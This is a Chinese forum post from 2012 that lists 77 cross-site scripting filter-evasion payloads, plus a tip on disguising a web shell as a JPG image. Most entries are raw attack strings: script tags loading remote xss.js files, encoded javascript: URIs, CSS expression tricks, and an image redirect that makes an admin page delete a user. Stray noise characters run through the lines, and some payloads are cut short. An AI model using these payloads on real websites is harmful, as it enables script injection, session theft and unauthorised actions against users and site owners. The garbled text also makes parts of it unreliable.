跨站图片shell: f/ h" _" d. O- L& k9 L* t
XSS跨站代码 <script>alert("")</script>
) r) ^1 Z* N3 u/ b4 T5 F5 J0 n) W; E; y
2 ?0 @5 G2 A, @- {将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
3 @4 B4 R5 K! X( Y) P0 ^' g; x3 M/ d
' i# e, c$ |7 u- Z6 F5 X( f
6 m; S& ] m% e7 L# N6 n1)普通的XSS JavaScript注入& d; }1 n |$ e' i U. y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 d6 N! \* ?( r9 k) U8 ?
- s- ?7 j |- x4 T8 i& R q4 X(2)IMG标签XSS使用JavaScript命令
+ s/ @& }6 ^3 F5 O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 k6 D+ s3 ~& l9 V+ E% P4 \
- Q9 p3 R& @, Y1 |& K* n(3)IMG标签无分号无引号
4 m1 C# t% ~4 k3 c5 E<IMG SRC=javascript:alert(‘XSS’)>
- z8 @/ w1 {6 V! V3 N* p* _5 h4 W: _5 | t% h
(4)IMG标签大小写不敏感7 a. r2 D" d \+ c* T1 F' O" ]( {$ a' x
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" Y3 w3 L- E3 i0 X R5 N6 t2 u- n( @+ l: a
(5)HTML编码(必须有分号)
1 _) k1 F5 b0 ]/ t- i<IMG SRC=javascript:alert(“XSS”)>* Q2 S' m, W) R2 n, \
: a2 u# J& o) D! A, B(6)修正缺陷IMG标签& q5 ^+ l" t+ u- |6 l; N# i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 K$ {3 T. T1 r
a7 S6 `# Z" B" k0 k
(7)formCharCode标签(计算器)" i2 b$ U9 D2 ~2 ?+ X% w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>$ ^# Y8 l) c- [1 T* Z7 b# m- R# ?
" @ A' d L1 G4 X4 S
(8)UTF-8的Unicode编码(计算器)- S! y0 B( R: X# m8 ]# ^6 D+ w
<IMG SRC=jav..省略..S')>* [" X' Q/ k# S6 W& \
+ Z; V; y; A' j9 ?" V, r; m(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: y& Y8 z: W3 |4 Z* X9 \+ x1 i# q<IMG SRC=jav..省略..S')>, X9 G' `+ z* m7 t
7 f' \; u) P. J7 l
(10)十六进制编码也是没有分号(计算器)
2 G7 g0 Z$ K0 \0 `9 ~7 |% i<IMG SRC=java..省略..XSS')>
( `7 m- k4 E0 U! R1 j6 e: v4 c/ A5 z' H; X( h
(11)嵌入式标签,将Javascript分开
0 O" B1 P6 E- w+ }6 ]1 ]3 q3 A; E<IMG SRC=”jav ascript:alert(‘XSS’);”> F: A, Z/ B8 [7 M+ H6 j# q
4 [/ K) Q. v* m0 B8 I7 d! Y7 k( K(12)嵌入式编码标签,将Javascript分开
/ A2 Q+ Z$ g/ k+ y. m. k<IMG SRC=”jav ascript:alert(‘XSS’);”>+ u7 ^3 F( M( {
& P1 R" s0 R% b8 _& |
(13)嵌入式换行符
0 z! F# d* R" F, [<IMG SRC=”jav ascript:alert(‘XSS’);”>- _( T1 f' f7 k* J( A! x
. E. F& {& G% }" D" R
(14)嵌入式回车* V* I/ g4 R& j/ A
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ b. s6 j, Z# y
0 i1 L! Q' k( d* F) V
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ z* k2 s& M+ T: s3 Z<IMG SRC=”javascript:alert(‘XSS‘)”>1 p2 p' h+ N. e9 V
& N% J+ L# N7 g" c(16)解决限制字符(要求同页面)
* c# f7 v5 Z' R6 V7 O<script>z=’document.’</script>
* [# w3 ^6 y9 L<script>z=z+’write(“‘</script>
9 K$ l0 @6 R- m/ l+ M* T& P) S<script>z=z+’<script’</script>; h, [9 E* f" {. i; t) O
<script>z=z+’ src=ht’</script>
: e: Q& s: ~1 P3 R% P<script>z=z+’tp://ww’</script>
! G+ e+ R1 x# D/ K' L% w1 c" t0 Q<script>z=z+’w.shell’</script>/ J$ I' b$ f: L C# G
<script>z=z+’.net/1.’</script>
# }5 `! E; A( `- G; q<script>z=z+’js></sc’</script>! p7 n6 f9 @- Y7 P- K# @
<script>z=z+’ript>”)’</script>
$ c7 n0 S2 u7 k: h9 ^' i* V$ M<script>eval_r(z)</script>
: d, q8 x3 O3 D4 P, [' {+ [3 E3 y3 ^, E: P8 f2 H5 A6 c
(17)空字符% f9 F; M1 f+ [; B; d t4 y
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. X, _: A( i8 o' Q
z& b/ ^6 c$ A, `7 ~(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; I6 R- C4 \- e' \ ?0 ?perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 \$ L/ ]5 G9 @: S) m
$ y! y/ c7 |/ a- A
(19)Spaces和meta前的IMG标签1 V6 x8 _9 H' \) g- s- P5 s
<IMG SRC=” javascript:alert(‘XSS’);”>9 N# C3 o2 P( c0 @& ]
( O6 _: C! t _1 `
(20)Non-alpha-non-digit XSS0 }' f6 P6 W8 b& O
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- g# i% l5 Q2 C& n0 x8 B0 L3 Y6 o( w5 ~* X4 ?# @, ?; p* T, `8 Q% i) l
(21)Non-alpha-non-digit XSS to 28 u8 m, Y8 H$ A! O, x8 W
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* X7 W) d$ e7 [
7 [7 U1 N) C* [ S(22)Non-alpha-non-digit XSS to 32 T3 w1 G3 K# q; T' i- I0 J
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 @2 @7 J; ^5 N5 Z
" o' W. m% d2 g8 H) F+ w(23)双开括号7 V3 X+ B/ a+ ?) N8 E0 ^ g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 W0 g! a& a$ P( M2 x }
/ h W7 L0 A/ ]$ F2 T3 |
(24)无结束脚本标记(仅火狐等浏览器)
5 [; V4 q! y$ n* n* v" m<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>. H' g/ _' s4 ~6 K; Z+ }: y
8 m: q" Z& C- R4 G' n(25)无结束脚本标记2* G4 G8 O7 {& H
<SCRIPT SRC=//3w.org/XSS/xss.js>
0 N/ a# N) b! N" o1 I, d3 }! T0 o% W7 P& V ?
(26)半开的HTML/JavaScript XSS+ Z) ?: a/ J8 [7 a5 M8 c3 Y) ^! Y+ H
<IMG SRC=”javascript:alert(‘XSS’)”
5 l4 W, L( `+ z, {9 j2 J
1 ^- e: l$ v, k4 u$ G* m(27)双开角括号) A0 A6 b7 g/ `& {% {; L. B! O2 @
<iframe src=http://3w.org/XSS.html <
& G+ D5 V( M: I3 G
& C( ~ G! J" H(28)无单引号 双引号 分号
1 H! A" u$ B* w( w# l<SCRIPT>a=/XSS/+ ~2 V: \, e( d5 [& G5 k
alert(a.source)</SCRIPT>' B2 U B7 p3 U. ]: C" E& F
4 g0 G) b1 e( b' U% R
(29)换码过滤的JavaScript$ `% U" r2 u) ]4 c
\”;alert(‘XSS’);//
4 W) x6 ?9 c5 E' m, v6 v4 u3 x8 P
(30)结束Title标签
0 g% Q( e J' t& B</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! }5 \* j8 r: s% T/ ?
8 Z S# b+ D3 @9 q(31)Input Image
# C8 e8 v9 d) Y# i5 G2 r) I, S<INPUT SRC=”javascript:alert(‘XSS’);”>
: W- k- C$ N3 `8 v( k* V% s; v, x. r0 c
(32)BODY Image+ O( q& D0 h' s( H
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ n0 y" ?: ^3 o9 W
3 Z2 A {+ Z! ?- M. K3 y(33)BODY标签 }4 F/ [) ]2 e: n2 Y$ }2 f. N
<BODY(‘XSS’)>
6 f% b/ I4 w0 V- _7 S, [
# o+ C+ r; O9 M6 ]/ s(34)IMG Dynsrc
! O; Q: `" c9 @6 c/ @* F3 O+ P7 X<IMG DYNSRC=”javascript:alert(‘XSS’)”>& r/ y& E; i! |
: w' m1 o7 d' `8 i(35)IMG Lowsrc
# _ Z$ l; ~/ G5 q7 k<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ V1 l. y3 Z8 S' U% q' E( a6 R4 ^
(36)BGSOUND: h# p" n' l7 K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
; \" O6 d. z0 ^8 P) o9 d" R U6 s) L2 e- U5 {
(37)STYLE sheet
6 h& }& M. f) _" A2 X<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ N" K& ]- [% {" m- ~! m* m$ K' S8 ?5 B* A& o6 Q
(38)远程样式表
3 z8 `. V f- C7 Y<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% _2 j1 b$ _" f% h$ w. G) l
4 y* x6 J4 U& i2 N$ S(39)List-style-image(列表式)2 Q" M% {2 E5 q( Q6 ]
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 R) k& ]+ K. }/ g* C
0 {6 w0 c* z; }7 j6 A* A% j(40)IMG VBscript& u6 J+ P) i- [) |0 F. S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% s+ v; x: b, A( y, e+ o& `/ x1 y1 H
(41)META链接url
; l6 E* d% {0 Y) v$ K! ?6 l<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
) ?6 l( i" R" I5 B/ S" a$ r ^2 G+ @3 h, A2 }. J' g& m
(42)Iframe" R, V: i7 t1 U* F9 q7 h3 Q
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
X0 K' V- |( v: L/ H0 s(43)Frame
2 ^0 Y, _$ i) g! v7 c# C2 D<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>/ \, `3 n' H) [& q- h9 B7 A
3 `! V1 s/ v& \1 J$ u: N(44)Table. b: O$ W i# U* A+ ?
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& ^, _ n7 W" X' c# c$ }) [, c( p0 q: v
(45)TD3 j! _' s9 R: W5 F1 s# ~
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 z; v& T8 A" q$ a" _( ?1 j, @
/ }: H% q' f, B& Y(46)DIV background-image
9 p( v1 V7 j9 ]1 c9 P4 b<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- E, g" X5 q- X. C
, D* l* r) [2 X3 ? `, r1 D! P4 l! U(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 W) g4 D4 R1 j b" Q
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
9 U2 O8 Y" \9 _
% R( m: {# W% O7 o(48)DIV expression
9 l% n( o4 P3 _<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 x# V! N3 m* {. C. p
: O7 I5 r1 t" T5 b- K(49)STYLE属性分拆表达
4 ]% g6 m! a* [# X% N% X5 j<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: f! f# k/ x4 g3 q' } X
" k$ Y1 x! O# L' U3 K) B$ F(50)匿名STYLE(组成:开角号和一个字母开头)8 L6 c# T7 U/ ~5 D0 m4 k. ]" h
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
' I# t! P# `" f
& B4 L- z! V8 o+ u% c$ j(51)STYLE background-image
9 n: Y( Y1 r% L4 m" B<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 W9 @$ N' u% B: Q. O
. F$ Y% X0 ? e+ k
(52)IMG STYLE方式
+ P7 S' O' j' P6 `- Uexppression(alert(“XSS”))’>/ h# X; k7 h' C3 Q/ n8 r; u
4 M; N+ h3 |, A
(53)STYLE background
# t, D0 A; `! @7 J<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* l) x# L( U3 V" A3 T3 y* Y. f7 K" G
(54)BASE; O: V: T3 O# B# ?+ H% d
<BASE HREF=”javascript:alert(‘XSS’);//”>2 W) ^+ g: I9 ~4 f
, T1 i: K. G4 W/ B
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
- T+ O* R3 X4 a. s* Z2 P3 J9 ]<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 D. b: W6 U8 s" r/ b: {" ^) i! D
; \8 [7 _8 ?+ B0 @0 o4 D! U(56)在flash中使用ActionScrpt可以混进你XSS的代码
% ~6 v3 K3 F2 k& N$ e8 t6 |a=”get”;0 Q) O/ l2 z( e, a \# \. }1 n1 ~
b=”URL(\”";9 N7 X' t* v, r. h/ O
c=”javascript:”;1 \& y, x- W$ l& f
d=”alert(‘XSS’);\”)”;* `- w- f V0 _ ] K5 Y% O1 B
eval_r(a+b+c+d);
+ u; T) i3 g6 n6 J) f' m9 k* G! o" Y+ \# f2 ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 b3 t; W q6 H: \, t$ ^) ]
<HTML xmlns:xss>
. a& U4 a3 v: j( u/ t7 D2 a<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, u2 f6 S F5 z
<xss:xss>XSS</xss:xss>
4 a# [8 P+ g& B</HTML>; l- U' [# W9 C) u# C1 j: j7 r
7 M+ t0 i/ C4 ?5 r
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用( x2 R1 H1 Q; N0 l6 D8 X
<SCRIPT SRC=””></SCRIPT>' }9 F+ K% ?/ \2 m2 Z& F6 {
) t; o) J0 [. o) x! F
(59)IMG嵌入式命令,可执行任意命令) x a& U7 Z# c5 f2 q8 B
<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 H# T# M( d+ o
6 h, K8 x- J1 y' p i( c(60)IMG嵌入式命令(a.jpg在同服务器) @' T" O1 X7 a2 I0 ]* N* G
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser+ [9 U1 k! \. X/ T5 s; _
$ j6 }; ^+ w* t(61)绕符号过滤
3 z' N k# k. y1 |/ z3 [<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 R7 q0 o p* q! N% Y
' R2 _0 Z- Z; ]
(62)
/ J% B, x7 ~1 P9 {3 C% U<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 ?9 K& J2 _3 I: b7 [3 g; G2 w$ Y
6 u" E5 H4 _+ J. U+ ]/ e- C) {(63)' H+ H) E, M* u
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; ?6 Q# ~& O4 z
! R" x# V6 Q. a2 {
(64)0 T* N7 X5 X9 A: u% s' Z5 R. |
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
" C2 a' _& W* D% f0 `0 b
' u7 v5 p7 O( f Z* I(65)
# C" t' F$ x. W* U+ y, r M6 @2 y' d<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 }% k: r2 o7 l
! k/ s; o$ w8 G+ c( _(66)
: H' V+ Z5 l! p<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>- C7 D! q" ?6 i- h
- e1 k, H& H$ A; l" ?6 E3 o
(67)* H; z' { w+ h" I/ e0 S- }5 s
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 e9 n% _0 g; q Y2 z' E: y
( c& Z9 F1 e% G+ f* o! ^6 V7 v
(68)URL绕行
6 ]! j$ J$ d7 `<A HREF=”http://127.0.0.1/”>XSS</A>
* Y' N6 }, m( |
0 k) c8 H$ C8 g3 Z. U(69)URL编码5 M- U1 {6 y: S0 |0 G- [
<A HREF=”http://3w.org”>XSS</A>
8 A. k/ Y/ Q( `4 h Y5 M3 J: N o
(70)IP十进制
# Z6 T5 H' B0 e/ R T6 f* i$ T0 B<A HREF=”http://3232235521″>XSS</A>, N( x( l0 E5 n
9 S( P! i2 O! X7 F# n, Y
(71)IP十六进制
3 o3 k' c. }: ~. f<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 u s/ I3 ~" z
7 U+ }* Y3 U& m0 n2 z(72)IP八进制- j5 F4 w# I$ v, j/ M3 Q0 z
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* T' w) F! g, E3 z7 D7 p
7 F' W1 y: d8 v2 R, s
(73)混合编码( z5 Z( K- [2 j6 x. k
<A HREF=”h" Q7 w7 [: a5 G# r
tt p://6 6.000146.0×7.147/”">XSS</A>
& H# O4 R. \" c, Y/ |. u) Q6 n2 j, ~
6 R" W# e" }5 F# M( M( U% O8 Q2 T(74)节省[http:]
6 X1 w, i1 }- ]! ]<A HREF=”//www.google.com/”>XSS</A>
* \! b8 e2 V, G# w. o
) w& T: e& L- [, V: @(75)节省[www]
& G) ?- y# y, T; ^<A HREF=”http://google.com/”>XSS</A>& F- D1 y4 [. F. Q/ K: a
+ d$ }9 l5 y5 ~$ |4 W+ m3 @
(76)绝对点绝对DNS1 _ a9 V/ j8 |9 m5 i" {
<A HREF=”http://www.google.com./”>XSS</A>/ u0 h7 k4 m8 f3 I7 P- U% W. O2 h4 y. t
5 Q. h9 ~& H& C. V' T& ]% k; w
(77)javascript链接
[/ j, E1 z1 O; a<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
* ]! r* c1 d; b Q |
发表于 2012-9-13 17:04:56
收藏
支持
反对